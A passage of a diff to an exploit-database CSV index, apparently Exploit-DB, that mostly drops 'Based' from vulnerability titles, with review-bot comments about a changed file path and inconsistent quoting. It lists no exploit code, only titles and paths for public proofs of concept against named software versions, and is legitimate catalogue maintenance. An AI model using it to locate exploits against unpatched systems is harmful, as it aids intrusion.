@@ -4783,7 +4783,7 @@ id,file,description,date,author,type,platform,port 38392,exploits/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",dos,linux, 38399,exploits/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,dos,windows, 38404,exploits/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,dos,windows, -38405,exploits/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,dos,windows, +38405,exploits/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Buffer Overflow",2015-10-06,Un_N0n,dos,windows, 38419,exploits/windows/dos/38419.txt,"SmallFTPd - Denial of Service",2013-04-03,AkaStep,dos,windows, 38420,exploits/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,dos,multiple, 38421,exploits/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,dos,linux, 
@@ -4816,16 +4816,16 @@ id,file,description,date,author,type,platform,port 38616,exploits/multiple/dos/38616.txt,"Python 2.7 - 'array.fromstring' Method Use-After-Free",2015-11-03,"John Leitch",dos,multiple, 38617,exploits/windows/dos/38617.txt,"Python 2.7 - 'strop.replace()' Method Integer Overflow",2015-11-03,"John Leitch",dos,windows, 38618,exploits/windows/dos/38618.txt,"Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read",2015-11-03,"John Leitch",dos,windows, -38620,exploits/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",dos,linux, +38620,exploits/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Out-of-Bounds Reads",2015-11-04,"Google Security Research",dos,linux, 38622,exploits/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",dos,linux, 38623,exploits/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",dos,multiple, 38626,exploits/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,dos,multiple, 38650,exploits/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash (PoC)",2015-11-07,"Luis Martínez",dos,windows, 39374,exploits/osx/dos/39374.c,"Apple Mac OSX Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",dos,osx, 38659,exploits/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,dos,windows, -38662,exploits/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",dos,multiple, -38681,exploits/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",dos,linux, -38685,exploits/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",dos,linux, 
+38662,exploits/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Out-of-Bounds Read",2015-11-09,"Google Security Research",dos,multiple, +38681,exploits/linux/dos/38681.py,"FBZX 2.10 - Local Stack Buffer Overflow",2015-11-11,"Juan Sacco",dos,linux, +38685,exploits/linux/dos/38685.py,"TACK 1.07 - Local Stack Buffer Overflow",2015-11-12,"Juan Sacco",dos,linux, 38687,exploits/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",dos,windows, 38701,exploits/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,dos,windows, 38702,exploits/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,dos,windows, @@ -4857,7 +4857,7 @@ id,file,description,date,author,type,platform,port 38796,exploits/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",dos,windows, 38798,exploits/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,dos,multiple, 38854,exploits/linux/dos/38854.sh,"Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",dos,linux, -38857,exploits/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",dos,linux, +38857,exploits/linux/dos/38857.md,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",dos,linux, 38858,exploits/windows/dos/38858.txt,"Malwarebytes AntiVirus 2.2.0 - Denial of Service (PoC)",2015-12-03,"Francis Provencher",dos,windows, 38878,exploits/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash (PoC)",2015-12-06,Un_N0n,dos,windows, 38909,exploits/linux/dos/38909.txt,"DenyHosts - 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",dos,linux, 
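Review bot: The 38857 line in the @@ -4857,7 hunk changes the file column (exploits/linux/dos/38857.txt to exploits/linux/dos/38857.md) and leaves the description alone, which makes it a path change sitting among title-only edits. Please confirm the same commit renames the file on disk, since otherwise this index row points at a path that does not exist, and consider calling the extension change out separately so it is not lost among the wording changes.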
@@ -4877,21 +4877,21 @@ id,file,description,date,author,type,platform,port 38978,exploits/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",dos,windows,11460 38979,exploits/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",dos,windows,11460 38980,exploits/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",dos,windows,11460 -38992,exploits/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, -38993,exploits/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38992,exploits/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38993,exploits/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, 38994,exploits/multiple/dos/38994.txt,"Wireshark - wmem_alloc Assertion Failure",2015-12-16,"Google Security Research",dos,multiple, 38995,exploits/multiple/dos/38995.txt,"Wireshark - dissect_zcl_pwr_prof_pwrprofstatersp Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, 38996,exploits/multiple/dos/38996.txt,"Wireshark - dissct_rsl_ipaccess_msg Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, -38997,exploits/multiple/dos/38997.txt,"Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38997,exploits/multiple/dos/38997.txt,"Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Buffer 
Overflow",2015-12-16,"Google Security Research",dos,multiple, 38998,exploits/multiple/dos/38998.txt,"Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV",2015-12-16,"Google Security Research",dos,multiple, 38999,exploits/multiple/dos/38999.txt,"Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV",2015-12-16,"Google Security Research",dos,multiple, 39000,exploits/multiple/dos/39000.txt,"Wireshark - my_dgt_tbcd_unpack Static Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, 39001,exploits/multiple/dos/39001.txt,"Wireshark - ascend_seek Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, 39002,exploits/multiple/dos/39002.txt,"Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free",2015-12-16,"Google Security Research",dos,multiple, -39003,exploits/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, -39004,exploits/multiple/dos/39004.txt,"Wireshark - find_signature Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, -39005,exploits/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, -39006,exploits/multiple/dos/39006.txt,"Wireshark - getRate Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +39003,exploits/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +39004,exploits/multiple/dos/39004.txt,"Wireshark - find_signature Stack Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +39005,exploits/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +39006,exploits/multiple/dos/39006.txt,"Wireshark - getRate Stack Out-of-Bounds Read",2015-12-16,"Google Security 
Research",dos,multiple, 39019,exploits/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",dos,windows, 39020,exploits/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",dos,windows, 39021,exploits/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",dos,windows, @@ -4924,8 +4924,8 @@ id,file,description,date,author,type,platform,port 39070,exploits/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)",2015-12-21,Un_N0n,dos,windows, 39072,exploits/win_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",dos,win_x86-64, 39073,exploits/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service)",2014-02-03,"Josue Rojas",dos,cgi, -39076,exploits/multiple/dos/39076.txt,"Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",dos,multiple, -39077,exploits/multiple/dos/39077.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1)",2015-12-22,"Google Security Research",dos,multiple, +39076,exploits/multiple/dos/39076.txt,"Wireshark - 'infer_pkt_encap' Heap Out-of-Bounds Read",2015-12-22,"Google Security Research",dos,multiple, +39077,exploits/multiple/dos/39077.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (1)",2015-12-22,"Google Security Research",dos,multiple, 39082,exploits/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",dos,multiple, 39091,exploits/php/dos/39091.pl,"WHMCompleteSolution (WHMCS) 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,dos,php, 39092,exploits/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,dos,php, 
@@ -4935,10 +4935,10 @@ id,file,description,date,author,type,platform,port 39225,exploits/hardware/dos/39225.txt,"Apple watchOS 2 - Crash (PoC)",2016-01-12,"Mohammad Reza Espargham",dos,hardware, 39226,exploits/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash (PoC)",2016-01-12,"Daniel Velazquez",dos,windows, 39158,exploits/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - Denial of Service",2016-01-03,Vishnu,dos,windows, -39162,exploits/multiple/dos/39162.txt,"pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, -39163,exploits/multiple/dos/39163.txt,"pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, +39162,exploits/multiple/dos/39162.txt,"pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, +39163,exploits/multiple/dos/39163.txt,"pdfium - CPDF_TextObject::CalcPositionData Heap Out-of-Bounds Read",2016-01-04,"Google Security Research",dos,multiple, 39164,exploits/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",dos,multiple, -39165,exploits/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",dos,multiple, +39165,exploits/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Buffer Overflow",2016-01-04,"Google Security Research",dos,multiple, 39169,exploits/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",dos,multiple, 39177,exploits/multiple/dos/39177.py,"VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",dos,multiple, 39180,exploits/windows/dos/39180.pl,"Winamp - '.flv' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",dos,windows, 
@@ -4963,13 +4963,13 @@ id,file,description,date,author,type,platform,port 39375,exploits/osx/dos/39375.c,"Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",dos,osx, 39308,exploits/linux/dos/39308.c,"Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",dos,linux, 39315,exploits/hardware/dos/39315.pl,"Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",dos,hardware, -39321,exploits/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39322,exploits/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39323,exploits/multiple/dos/39323.txt,"Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39324,exploits/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow",2016-01-26,"Google Security Research",dos,multiple, +39321,exploits/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39322,exploits/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39323,exploits/multiple/dos/39323.txt,"Wireshark - 'iseries_check_file_type' Stack Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39324,exploits/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Buffer Overflow",2016-01-26,"Google Security Research",dos,multiple, 39325,exploits/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39326,exploits/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' 
Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, -39327,exploits/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39326,exploits/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, +39327,exploits/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple, 39329,exploits/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",dos,windows, 39330,exploits/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",dos,windows, 39331,exploits/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial of Service",2014-05-14,j0s3h4x0r,dos,windows, 
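Review bot: Function names are quoted inconsistently across the lines the @@ -4963,13 hunk rewrites: 39323 and 39326 put 'iseries_check_file_type' and 'nettrace_3gpp_32_423_file_open' in single quotes, while 39324 and 39327 leave dissect_nhdr_extopt and dissect_ber_constrained_bitstring bare. Since every one of these descriptions is being edited anyway, pick one form for Wireshark function names and apply it here, so that a search by quoted function name does not silently miss half of the entries.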
@@ -5014,7 +5014,7 @@ id,file,description,date,author,type,platform,port 39445,exploits/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",dos,linux, 39447,exploits/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,dos,windows, 39452,exploits/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,dos,windows, -39454,exploits/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",dos,linux, +39454,exploits/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Buffer Overflow (PoC)",2016-02-16,"Google Security Research",dos,linux, 39460,exploits/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",dos,multiple, 39461,exploits/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",dos,multiple, 39462,exploits/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",dos,multiple, 
@@ -5032,11 +5032,11 @@ id,file,description,date,author,type,platform,port 39483,exploits/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",dos,multiple, 39484,exploits/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",dos,multiple, 39487,exploits/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",dos,multiple, -39490,exploits/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow",2016-02-24,"Google Security Research",dos,multiple, -39491,exploits/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, -39492,exploits/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, -39493,exploits/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, -39494,exploits/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap Based Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39490,exploits/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Buffer Overflow",2016-02-24,"Google Security Research",dos,multiple, +39491,exploits/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39492,exploits/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39493,exploits/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, +39494,exploits/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap Buffer Overread",2016-02-24,"Google Security Research",dos,linux, 39502,exploits/linux/dos/39502.py,"GpicView 0.2.5 - 
Crash (PoC)",2016-02-26,"David Silveiro",dos,linux, 39503,exploits/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",dos,multiple, 39504,exploits/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",dos,android, @@ -5091,8 +5091,8 @@ id,file,description,date,author,type,platform,port 39633,exploits/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1)",2016-03-30,"Francis Provencher",dos,multiple, 39634,exploits/multiple/dos/39634.txt,"Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2)",2016-03-30,"Francis Provencher",dos,multiple, 39635,exploits/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption",2016-03-30,"Francis Provencher",dos,multiple, -39638,exploits/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",dos,linux, -39644,exploits/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",dos,multiple, +39638,exploits/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Buffer Overflow",2016-03-30,"Stelios Tsampas",dos,linux, +39644,exploits/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Out-of-Bounds Read",2016-03-31,"Google Security Research",dos,multiple, 39647,exploits/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",dos,windows, 39648,exploits/windows/dos/39648.txt,"Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",dos,windows, 39649,exploits/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",dos,multiple, 
@@ -5114,7 +5114,7 @@ id,file,description,date,author,type,platform,port 39740,exploits/windows/dos/39740.cpp,"Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",dos,windows, 39743,exploits/windows/dos/39743.txt,"Microsoft Windows Kernel - 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",dos,windows, 39747,exploits/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",dos,linux, -39748,exploits/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow",2016-04-29,"Google Security Research",dos,multiple, +39748,exploits/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Buffer Overflow",2016-04-29,"Google Security Research",dos,multiple, 39749,exploits/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",dos,multiple, 39750,exploits/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",dos,multiple, 39767,exploits/multiple/dos/39767.txt,"ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",dos,multiple, 
@@ -5137,7 +5137,7 @@ id,file,description,date,author,type,platform,port 39800,exploits/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,dos,linux, 39801,exploits/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,dos,android, 39802,exploits/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-11,"Nipun Jaswal",dos,windows, -39812,exploits/multiple/dos/39812.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2)",2016-05-13,"Google Security Research",dos,multiple, +39812,exploits/multiple/dos/39812.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (2)",2016-05-13,"Google Security Research",dos,multiple, 39819,exploits/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,dos,windows, 39824,exploits/multiple/dos/39824.txt,"Adobe Flash - JXR Processing Out-of-Bounds Read",2016-05-17,"Google Security Research",dos,multiple, 39825,exploits/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",dos,multiple, 
@@ -5149,16 +5149,16 @@ id,file,description,date,author,type,platform,port 39831,exploits/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",dos,multiple, 39832,exploits/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)",2016-05-17,"Google Security Research",dos,windows, 39833,exploits/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)",2016-05-17,"Google Security Research",dos,windows, -39834,exploits/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",dos,multiple, +39834,exploits/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",dos,multiple, 39835,exploits/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",dos,multiple, 39842,exploits/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,dos,linux, 39846,exploits/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,dos,windows, 39857,exploits/windows/dos/39857.txt,"Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities",2016-05-26,LiquidWorm,dos,windows, -39859,exploits/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow",2016-05-26,"Google Security Research",dos,multiple, -39860,exploits/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap Based Overreads",2016-05-26,"Google Security Research",dos,multiple, -39861,exploits/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread",2016-05-26,"Google Security 
Research",dos,multiple, -39862,exploits/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread",2016-05-26,"Google Security Research",dos,multiple, -39863,exploits/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",dos,multiple, +39859,exploits/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap Buffer Overflow",2016-05-26,"Google Security Research",dos,multiple, +39860,exploits/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap Overreads",2016-05-26,"Google Security Research",dos,multiple, +39861,exploits/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Overread",2016-05-26,"Google Security Research",dos,multiple, +39862,exploits/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Overread",2016-05-26,"Google Security Research",dos,multiple, +39863,exploits/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Out-of-Bounds Reads",2016-05-26,"Google Security Research",dos,multiple, 39867,exploits/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",dos,multiple, 39873,exploits/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux, 39875,exploits/linux/dos/39875.py,"TCPDump 4.5.1 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux, 
@@ -5178,7 +5178,7 @@ id,file,description,date,author,type,platform,port 39929,exploits/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",dos,multiple, 39930,exploits/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",dos,osx, 39939,exploits/linux/dos/39939.rb,"iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)",2016-06-13,HaHwul,dos,linux, -39940,exploits/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",dos,linux, +39940,exploits/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Memory Corruption",2016-06-13,"Google Security Research",dos,linux, 39941,exploits/linux/dos/39941.txt,"Foxit 